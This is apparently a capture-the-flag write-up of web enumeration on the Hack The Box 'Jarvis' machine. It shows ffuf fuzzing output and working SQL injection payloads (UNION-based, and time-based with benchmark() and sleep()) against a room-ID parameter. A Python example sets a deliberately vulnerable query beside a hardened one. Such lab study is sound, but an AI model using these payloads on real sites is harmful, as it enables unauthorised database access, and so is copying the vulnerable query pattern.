Web
Nmap discovered a web server running on port 80 of the target.
Webroot
It’s a hotel
I noticed the domain information at the top
I appended it to the /etc/hosts file on Kali for local DNS resolution
Wappalyzer identified the technologies involved.
The website is written in PHP
The passive crawler from Burp Suite enumerated the files and directories that are hard-coded into the web root
/dining-bar.php
It features a total of 6 dishes.
Those buttons aren’t functional.
/rooms-suites.php
The page also features a total of 6 rooms
Those buttons lead to the rooms.php file with the cod parameter
This appears to be a clear use of the PHP include() function, which can be abused for LFI.
/rooms.php
I am unable to load the rooms.php file by itself, as it redirects to the index.php file.
The cod parameter must be supplied.
So the rooms.php file is rather a display for the rooms-suites.php file
SQLi?
However, I get a completely different result if I supply an arbitrary value to the cod parameter.
This looks to me that it’s pulling data from a SQL query
I will try SQLi
Union-based SQLi (in-band)
-1 UNION SELECT 1,1,1,1,1,1,1#
SQLi confirmed!
Time-based SQLi (Blind or Out-of-Band)
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ ffuf -c -w /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt -u http://supersecurehotel.htb/room.php?cod=FUZZ
________________________________________________
:: Method : GET
:: URL : http://supersecurehotel.htb/room.php?cod=FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Fuzzing/SQLi/Generic-SQLi.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
benchmark(10000000,MD5(1))# [Status: 200, Size: 5916, Words: 308, Lines: 190, Duration: 4041ms]
:: Progress: [267/267] :: Job [1/1] :: 46 req/sec :: Duration: [0:00:04] :: Errors: 2 ::
Apparently, it works for Blind SQLi as well.
The testing payload was benchmark(10000000,MD5(1))#
Yep, it's paused.
sleep() works fine too
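As an added illustration (not code from the box or from this writeup), here is the pattern behind both the UNION and the time-based findings above: a constructed SQLite stand-in for the site's MySQL query that interpolates cod straight into the SQL text, beside a hardened version that validates the value and binds it as a parameter. The table layout and column names are assumptions chosen to match the 7-column UNION payload; MySQL's trailing `#` comment is dropped because SQLite does not accept it.

```python
import sqlite3

# Constructed sample schema (assumption): seven columns, so the page's
# "-1 UNION SELECT 1,1,1,1,1,1,1" payload lines up with the real SELECT.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE room(cod INTEGER, name TEXT, price INTEGER, "
        "descrip TEXT, star INTEGER, image TEXT, mini TEXT)"
    )
    db.executemany("INSERT INTO room VALUES (?,?,?,?,?,?,?)", [
        (1, "Superior Family", 300, "constructed row", 5, "1.jpg", "1-mini.jpg"),
        (2, "Suite", 360, "constructed row", 5, "2.jpg", "2-mini.jpg"),
    ])
    return db

def room_vulnerable(db, cod):
    # The request parameter becomes part of the SQL text, so a value such as
    # "-1 UNION SELECT ..." or "1 AND sleep(5)" is executed as SQL, which is
    # exactly what the UNION and time-based probes above rely on.
    sql = f"SELECT * FROM room WHERE cod={cod}"
    return db.execute(sql).fetchall()

def room_hardened(db, cod):
    # 1) Allow-list the input: cod is a room id, so only digits are acceptable.
    #    Anything else (UNION, benchmark(), sleep(), quotes) is rejected here.
    if not isinstance(cod, str) or not cod.isdigit():
        return None
    # 2) Bind the value as a parameter so the driver never treats it as SQL.
    return db.execute("SELECT * FROM room WHERE cod=?", (int(cod),)).fetchall()

def demo():
    db = make_db()
    union = "-1 UNION SELECT 1,1,1,1,1,1,1"   # page payload, minus MySQL's '#'
    return {
        "vuln_normal": room_vulnerable(db, "1"),
        "vuln_union": room_vulnerable(db, union),   # attacker-controlled row
        "safe_normal": room_hardened(db, "1"),
        "safe_union": room_hardened(db, union),     # None: rejected before SQL
        "safe_sleep": room_hardened(db, "1 AND sleep(5)"),
    }

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```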
Fuzzing
┌──(kali㉿kali)-[~/archive/htb/labs/jarvis]
└─$ ffuf -c -w /usr/share/wordlists/seclists/discovery/web-content/directory-list-2.3-medium.txt -u http://$IP/FUZZ -ic -e .html,.txt,.php
________________________________________________
:: Method : GET
:: URL : http://10.10.10.143/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .html .txt .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
images [status: 301, Size: 313, Words: 20, Lines: 10, Duration: 1592ms]
index.php [status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 2599ms]
nav.php [status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 33ms]
footer.php [status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 34ms]
css [status: 301, Size: 310, Words: 20, Lines: 10, Duration: 31ms]
js [status: 301, Size: 309, Words: 20, Lines: 10, Duration: 31ms]
fonts [status: 301, Size: 312, Words: 20, Lines: 10, Duration: 31ms]
phpmyadmin [status: 301, Size: 317, Words: 20, Lines: 10, Duration: 33ms]
connection.php [status: 200, Size: 0, Words: 1, Lines: 1, Duration: 36ms]
room.php [status: 302, Size: 3024, Words: 181, Lines: 102, Duration: 39ms]
sass [status: 301, Size: 311, Words: 20, Lines: 10, Duration: 35ms]
:: Progress: [882188/882188] :: Job [1/1] :: 1111 req/sec :: Duration: [0:12:25] :: Errors: 0 ::
ffuf discovered some additional files and directories.
/nav.php
The nav.php file appears to be the header
footer.php
It’s literally just the footer
/phpmyadmin/
There is an instance of phpMyAdmin, but I don't have valid credentials for now.
connection.php
It doesn’t display anything.